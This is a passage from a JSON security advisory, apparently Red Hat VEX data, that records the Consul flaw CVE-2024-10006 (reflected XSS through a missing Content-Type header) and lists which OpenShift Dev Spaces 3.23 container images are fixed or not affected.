            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/openvsx-rhel9@sha256:1168d897f16b276ba5a6e6170e31fbe1499a980666aed493b2fe27036471ba55_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/openvsx-rhel9@sha256:15300e7d45a8e2093ef6f33303174f7361de7d9b648f8c9f2cf06f8ba3c56c76_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/openvsx-rhel9@sha256:6ccd50b0049e4ba0f9d4ea8779b17c6acc95395490579fbaa3b9e9084ac7d314_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/openvsx-rhel9@sha256:e762a9019e4b5afd27331ad519a5b63a2bba3c7eb522533e0932e97c2879a36e_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:5f4c5323da09593280fc61c2df7fced0f6dc9d3ca322d27069f51334c3d18dae_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:918c66e3ea09e481c38673314021ef1aa6b46afc9dcb115b9d19b6819c5db4a7_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:cc4f2ce5926da93eaf81b0935d3171d81a310ec97e3c08bbbf6599752446810d_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:f2bcd5123e4fad7aa4ad54f2819a1beb75d844302aa162e0335c1a0191fe5346_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/server-rhel9@sha256:27b7eef1c64e432dbe15e92cf745a951aebdc9b379d9c02dbfef6df296c39cd1_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/server-rhel9@sha256:3cfcd5f9ab8ec42cefd8fab992ecb493a9d14126bdf53ba542ffa4b51fd1684c_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/server-rhel9@sha256:641354f1d56627f49af3e32ad963616b69aac644ac33d664e7fe29de32fe43b3_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/server-rhel9@sha256:fa5400aecca1a46c4b98d00c749ea56d6187ced20952f02e4dd1c12e2467117e_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/traefik-rhel9@sha256:15a4a74016cdb94aece0bc651edd221b72a9202e5fd414d30ae969707cb5b4c9_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/traefik-rhel9@sha256:5361443dee5415dc554d79e2fa23a6b336f1d8ea89fb20a4caa72f70574b939b_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/traefik-rhel9@sha256:a152f1e75dd10ba692587a4e702d59cd1c5adcde8b97390f58742270edf85d33_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/traefik-rhel9@sha256:f17428eced9d6bec1eaaa1510b68250824d3ace2f66af7f31fbf7327ca11540c_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-base-rhel9@sha256:42d8388fafeb7c188b03389c92561da4068f91a8cc2343f33d967939342e4f64_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-base-rhel9@sha256:a86e59cedc67e9fcee3412afa157572a2ab815a3d9e18da03ada502f7313cc80_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-base-rhel9@sha256:b60b4b992b89b82620e5ea618350a97434b272d1f023200dcbeae642612e3569_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-base-rhel9@sha256:ee9d72769b916b350307df495022e04add1fbcd67c1e62757fd316e7f1dd60ae_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-rhel9@sha256:53618eb41967e64660e87e5ad6ce8f5d9803aed9bb48da8898aaefb4d0a4632d_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-rhel9@sha256:65176a94e684c200beef8f25016982ab212bdcd10d31b54a831310e20c026f77_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-rhel9@sha256:a4ca99dc99b864ef805f3e8d997f0567168c809433f16ec23540c0b8ead96216_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-rhel9@sha256:cc31b6212f77e03383e615ee30fd97419806c3841f18d2f6c950d82cdd21e872_ppc64le"
          ]
        }
      ],
      "threats": [
        {
          "category": "impact",
          "details": "Low"
        }
      ],
      "title": "hashicorp/consul: consul: Consul L7 Intentions Vulnerable To URL Path Bypass"
    },
    {
      "cve": "CVE-2024-10006",
      "cwe": {
        "id": "CWE-644",
        "name": "Improper Neutralization of HTTP Headers for Scripting Syntax"
      },
      "discovery_date": "2024-10-30T22:00:44.245072+00:00",
      "flags": [
        {
          "label": "vulnerable_code_not_present",
          "product_ids": [
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces-tech-preview/idea-rhel9@sha256:df24ebb239a2cc0d4543309f51a7268c7d524d428a536e0b3443c51089c3f87e_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces-tech-preview/jetbrains-ide-rhel9@sha256:0dc291e3dc58d285d054a35b480d14c3912777e14fd643915b8ceabd178ad6bf_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces-tech-preview/jetbrains-ide-rhel9@sha256:ac5b3e78470c747377dbc9ecb6e0680d724086c331955ed5471b74d01155ece8_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces-tech-preview/jetbrains-ide-rhel9@sha256:cd1ee1d15cafe77bbf8e283cee2cde88dcdfb59c9545867a047cf4b42089aa85_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces-tech-preview/jetbrains-ide-rhel9@sha256:d0b17cb5f9a530ca959058fe926b3f5c42539487e23587d51948f49d7a38cf5d_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/code-rhel9@sha256:2bfe5265856abdd8cb490bde852d4e992f1793684f003d1ef53776fe69d790d7_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/code-rhel9@sha256:32d9568317c55235f75c4d0e1c98de6d4af252cbdd116ed2355025cbaeac862f_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/code-rhel9@sha256:48b99d167a5c54a98e69bba441bb5b70db2ffe065d3f8f8d23ecfed7b813336e_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/code-rhel9@sha256:8b2b33e91756bbd1c7ed6905e00176b9d55a4e13aee2f84862bc571a8a82f113_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/configbump-rhel9@sha256:43cdf063e9a6aa5f84233c8bd850a711b5d5fae8a7795803609fec07d189ca05_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/configbump-rhel9@sha256:7ad9073c0a768f170cf8d4311ea35ec1caccfdefdf6d1dccbc10ed01cdeafd16_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/configbump-rhel9@sha256:934c224a59086c689be1839b6846a0984370a78a8adc8510fa692f5215bb6182_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/configbump-rhel9@sha256:d2bfcb27baf36e569eca4f7c85f458a180d7938616413a4cf8e10cb329e6a150_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/dashboard-rhel9@sha256:78dabed4a5fc1eb3246778e6ee6e1a543829cf88d0b03f0ccccf101c41a7bdda_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/dashboard-rhel9@sha256:7c98501fee1297a24caa77d325f6bfd7f91192589f0aa22d47d9766e8219c749_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/dashboard-rhel9@sha256:905d45518e20ea10daa3a35ea2f2201a6f762a16f9b4829ce37b7396d493ac59_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/dashboard-rhel9@sha256:91e064bccc3f7320844763fc136cb4c650db40190e01edebe16135bcc00627ac_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/devspaces-operator-bundle@sha256:a48dd94d5616183843ba939146b7e4d985210cdd902038ff80ff6df3df3d74ca_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:2b18f2cf31e0914762cc6e99c9797c24a19db69ca08bc9983bc2aacc85ee7024_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:38c9b56aa9c2a5153e01ffc1edb399247ed1937b9382ac4f0fb2beae4c27f69a_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:59f85768c28401783b9475ce21088e3d8fbf6bcd64bb49e3a243c881ac6b546c_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:f5b515ecaea7d542ac18ea5a056c99fe84ca2ac25fa3904bdc50a78ecf47541f_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:8cdf016c4d61bce4f244415ae192fe1647ef517ba1690f2009b5b8e1104c72a7_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:a69c6f8b091d11c69b6864edc6973c6f5f4515eb3a1923bf51fdb971315c28b0_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:ad5f4d1b7f712416bb62785375ce15ef1a5cb3f1a77226899abc8aba32a11623_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:c9808efcb221c10d78bdf663e3b5e3d5d281bf59702be049090fc1fa0511b078_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/machineexec-rhel9@sha256:13f0ec3ce663f6701501e82bbb508549e149588eedb0982729a59d98c88d0ba0_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/machineexec-rhel9@sha256:43d9679eb3ac8d5287863137f2d698d814a2fbc2fbd6a6aacba11240cd76d40c_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/machineexec-rhel9@sha256:d23a4d9f0967f53d15fefda63e972e035d23aebe819dd11a6cec9beceacd8997_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/machineexec-rhel9@sha256:e32fc2e1c50fb1110a835e29e6e360b4127ed84fca98c6276b0b171ccd6cb223_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/openvsx-rhel9@sha256:1168d897f16b276ba5a6e6170e31fbe1499a980666aed493b2fe27036471ba55_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/openvsx-rhel9@sha256:15300e7d45a8e2093ef6f33303174f7361de7d9b648f8c9f2cf06f8ba3c56c76_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/openvsx-rhel9@sha256:6ccd50b0049e4ba0f9d4ea8779b17c6acc95395490579fbaa3b9e9084ac7d314_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/openvsx-rhel9@sha256:e762a9019e4b5afd27331ad519a5b63a2bba3c7eb522533e0932e97c2879a36e_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:5f4c5323da09593280fc61c2df7fced0f6dc9d3ca322d27069f51334c3d18dae_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:918c66e3ea09e481c38673314021ef1aa6b46afc9dcb115b9d19b6819c5db4a7_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:cc4f2ce5926da93eaf81b0935d3171d81a310ec97e3c08bbbf6599752446810d_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:f2bcd5123e4fad7aa4ad54f2819a1beb75d844302aa162e0335c1a0191fe5346_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/server-rhel9@sha256:27b7eef1c64e432dbe15e92cf745a951aebdc9b379d9c02dbfef6df296c39cd1_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/server-rhel9@sha256:3cfcd5f9ab8ec42cefd8fab992ecb493a9d14126bdf53ba542ffa4b51fd1684c_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/server-rhel9@sha256:641354f1d56627f49af3e32ad963616b69aac644ac33d664e7fe29de32fe43b3_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/server-rhel9@sha256:fa5400aecca1a46c4b98d00c749ea56d6187ced20952f02e4dd1c12e2467117e_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-base-rhel9@sha256:42d8388fafeb7c188b03389c92561da4068f91a8cc2343f33d967939342e4f64_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-base-rhel9@sha256:a86e59cedc67e9fcee3412afa157572a2ab815a3d9e18da03ada502f7313cc80_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-base-rhel9@sha256:b60b4b992b89b82620e5ea618350a97434b272d1f023200dcbeae642612e3569_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-base-rhel9@sha256:ee9d72769b916b350307df495022e04add1fbcd67c1e62757fd316e7f1dd60ae_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-rhel9@sha256:53618eb41967e64660e87e5ad6ce8f5d9803aed9bb48da8898aaefb4d0a4632d_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-rhel9@sha256:65176a94e684c200beef8f25016982ab212bdcd10d31b54a831310e20c026f77_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-rhel9@sha256:a4ca99dc99b864ef805f3e8d997f0567168c809433f16ec23540c0b8ead96216_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-rhel9@sha256:cc31b6212f77e03383e615ee30fd97419806c3841f18d2f6c950d82cdd21e872_ppc64le"
          ]
        }
      ],
      "ids": [
        {
          "system_name": "Red Hat Bugzilla ID",
          "text": "2322858"
        }
      ],
      "notes": [
        {
          "category": "description",
          "text": "A flaw was found in HashiCorp Consul and Consul Enterprise. The server response does not explicitly set a Content-Type HTTP header, allowing user-provided inputs to be misinterpreted and can lead to reflected cross-site scripting (XSS).",
          "title": "Vulnerability description"
        },
        {
          "category": "summary",
          "text": "hashicorp/consul: consul: Consul L7 Intentions Vulnerable To Headers Bypass",
          "title": "Vulnerability summary"
        },
        {
          "category": "other",
          "text": "This vulnerability is rated as important severity because HashiCorp Consul fails to set a Content-Type HTTP header, allowing user inputs to be misinterpreted and potentially leading to reflected cross-site scripting (XSS). This can compromise both confidentiality and integrity, posing a risk to user data and application security, which requires prompt remediation.",
          "title": "Statement"
        },
        {
          "category": "general",
          "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
          "title": "CVSS score applicability"
        }
      ],
      "product_status": {
        "fixed": [
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/traefik-rhel9@sha256:15a4a74016cdb94aece0bc651edd221b72a9202e5fd414d30ae969707cb5b4c9_amd64",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/traefik-rhel9@sha256:5361443dee5415dc554d79e2fa23a6b336f1d8ea89fb20a4caa72f70574b939b_s390x",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/traefik-rhel9@sha256:a152f1e75dd10ba692587a4e702d59cd1c5adcde8b97390f58742270edf85d33_ppc64le",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/traefik-rhel9@sha256:f17428eced9d6bec1eaaa1510b68250824d3ace2f66af7f31fbf7327ca11540c_arm64"
        ],
        "known_not_affected": [
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces-tech-preview/idea-rhel9@sha256:df24ebb239a2cc0d4543309f51a7268c7d524d428a536e0b3443c51089c3f87e_amd64",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces-tech-preview/jetbrains-ide-rhel9@sha256:0dc291e3dc58d285d054a35b480d14c3912777e14fd643915b8ceabd178ad6bf_ppc64le",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces-tech-preview/jetbrains-ide-rhel9@sha256:ac5b3e78470c747377dbc9ecb6e0680d724086c331955ed5471b74d01155ece8_amd64",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces-tech-preview/jetbrains-ide-rhel9@sha256:cd1ee1d15cafe77bbf8e283cee2cde88dcdfb59c9545867a047cf4b42089aa85_s390x",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces-tech-preview/jetbrains-ide-rhel9@sha256:d0b17cb5f9a530ca959058fe926b3f5c42539487e23587d51948f49d7a38cf5d_arm64",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/code-rhel9@sha256:2bfe5265856abdd8cb490bde852d4e992f1793684f003d1ef53776fe69d790d7_amd64",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/code-rhel9@sha256:32d9568317c55235f75c4d0e1c98de6d4af252cbdd116ed2355025cbaeac862f_arm64",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/code-rhel9@sha256:48b99d167a5c54a98e69bba441bb5b70db2ffe065d3f8f8d23ecfed7b813336e_s390x",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/code-rhel9@sha256:8b2b33e91756bbd1c7ed6905e00176b9d55a4e13aee2f84862bc571a8a82f113_ppc64le",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/configbump-rhel9@sha256:43cdf063e9a6aa5f84233c8bd850a711b5d5fae8a7795803609fec07d189ca05_arm64",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/configbump-rhel9@sha256:7ad9073c0a768f170cf8d4311ea35ec1caccfdefdf6d1dccbc10ed01cdeafd16_ppc64le",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/configbump-rhel9@sha256:934c224a59086c689be1839b6846a0984370a78a8adc8510fa692f5215bb6182_s390x",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/configbump-rhel9@sha256:d2bfcb27baf36e569eca4f7c85f458a180d7938616413a4cf8e10cb329e6a150_amd64",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/dashboard-rhel9@sha256:78dabed4a5fc1eb3246778e6ee6e1a543829cf88d0b03f0ccccf101c41a7bdda_arm64",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/dashboard-rhel9@sha256:7c98501fee1297a24caa77d325f6bfd7f91192589f0aa22d47d9766e8219c749_s390x",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/dashboard-rhel9@sha256:905d45518e20ea10daa3a35ea2f2201a6f762a16f9b4829ce37b7396d493ac59_amd64",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/dashboard-rhel9@sha256:91e064bccc3f7320844763fc136cb4c650db40190e01edebe16135bcc00627ac_ppc64le",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/devspaces-operator-bundle@sha256:a48dd94d5616183843ba939146b7e4d985210cdd902038ff80ff6df3df3d74ca_amd64",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:2b18f2cf31e0914762cc6e99c9797c24a19db69ca08bc9983bc2aacc85ee7024_amd64",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:38c9b56aa9c2a5153e01ffc1edb399247ed1937b9382ac4f0fb2beae4c27f69a_ppc64le",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:59f85768c28401783b9475ce21088e3d8fbf6bcd64bb49e3a243c881ac6b546c_s390x",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:f5b515ecaea7d542ac18ea5a056c99fe84ca2ac25fa3904bdc50a78ecf47541f_arm64",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:8cdf016c4d61bce4f244415ae192fe1647ef517ba1690f2009b5b8e1104c72a7_s390x",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:a69c6f8b091d11c69b6864edc6973c6f5f4515eb3a1923bf51fdb971315c28b0_amd64",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:ad5f4d1b7f712416bb62785375ce15ef1a5cb3f1a77226899abc8aba32a11623_ppc64le",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:c9808efcb221c10d78bdf663e3b5e3d5d281bf59702be049090fc1fa0511b078_arm64",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/machineexec-rhel9@sha256:13f0ec3ce663f6701501e82bbb508549e149588eedb0982729a59d98c88d0ba0_ppc64le",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/machineexec-rhel9@sha256:43d9679eb3ac8d5287863137f2d698d814a2fbc2fbd6a6aacba11240cd76d40c_arm64",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/machineexec-rhel9@sha256:d23a4d9f0967f53d15fefda63e972e035d23aebe819dd11a6cec9beceacd8997_amd64",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/machineexec-rhel9@sha256:e32fc2e1c50fb1110a835e29e6e360b4127ed84fca98c6276b0b171ccd6cb223_s390x",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/openvsx-rhel9@sha256:1168d897f16b276ba5a6e6170e31fbe1499a980666aed493b2fe27036471ba55_s390x",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/openvsx-rhel9@sha256:15300e7d45a8e2093ef6f33303174f7361de7d9b648f8c9f2cf06f8ba3c56c76_arm64",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/openvsx-rhel9@sha256:6ccd50b0049e4ba0f9d4ea8779b17c6acc95395490579fbaa3b9e9084ac7d314_amd64",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/openvsx-rhel9@sha256:e762a9019e4b5afd27331ad519a5b63a2bba3c7eb522533e0932e97c2879a36e_ppc64le",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:5f4c5323da09593280fc61c2df7fced0f6dc9d3ca322d27069f51334c3d18dae_ppc64le",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:918c66e3ea09e481c38673314021ef1aa6b46afc9dcb115b9d19b6819c5db4a7_amd64",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:cc4f2ce5926da93eaf81b0935d3171d81a310ec97e3c08bbbf6599752446810d_arm64",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:f2bcd5123e4fad7aa4ad54f2819a1beb75d844302aa162e0335c1a0191fe5346_s390x",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/server-rhel9@sha256:27b7eef1c64e432dbe15e92cf745a951aebdc9b379d9c02dbfef6df296c39cd1_amd64",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/server-rhel9@sha256:3cfcd5f9ab8ec42cefd8fab992ecb493a9d14126bdf53ba542ffa4b51fd1684c_arm64",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/server-rhel9@sha256:641354f1d56627f49af3e32ad963616b69aac644ac33d664e7fe29de32fe43b3_s390x",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/server-rhel9@sha256:fa5400aecca1a46c4b98d00c749ea56d6187ced20952f02e4dd1c12e2467117e_ppc64le",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-base-rhel9@sha256:42d8388fafeb7c188b03389c92561da4068f91a8cc2343f33d967939342e4f64_amd64",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-base-rhel9@sha256:a86e59cedc67e9fcee3412afa157572a2ab815a3d9e18da03ada502f7313cc80_arm64",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-base-rhel9@sha256:b60b4b992b89b82620e5ea618350a97434b272d1f023200dcbeae642612e3569_s390x",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-base-rhel9@sha256:ee9d72769b916b350307df495022e04add1fbcd67c1e62757fd316e7f1dd60ae_ppc64le",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-rhel9@sha256:53618eb41967e64660e87e5ad6ce8f5d9803aed9bb48da8898aaefb4d0a4632d_arm64",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-rhel9@sha256:65176a94e684c200beef8f25016982ab212bdcd10d31b54a831310e20c026f77_amd64",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-rhel9@sha256:a4ca99dc99b864ef805f3e8d997f0567168c809433f16ec23540c0b8ead96216_s390x",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-rhel9@sha256:cc31b6212f77e03383e615ee30fd97419806c3841f18d2f6c950d82cdd21e872_ppc64le"
        ]
      },
      "references": [
        {
          "category": "self",
          "summary": "Canonical URL",
          "url": "https://access.redhat.com/security/cve/CVE-2024-10006"
        },
        {
          "category": "external",
          "summary": "RHBZ#2322858",
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2322858"
        },
        {
          "category": "external",
          "summary": "https://www.cve.org/CVERecord?id=CVE-2024-10006",
          "url": "https://www.cve.org/CVERecord?id=CVE-2024-10006"
        },
        {
          "category": "external",
          "summary": "https://nvd.nist.gov/vuln/detail/CVE-2024-10006",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-10006"
        },
        {
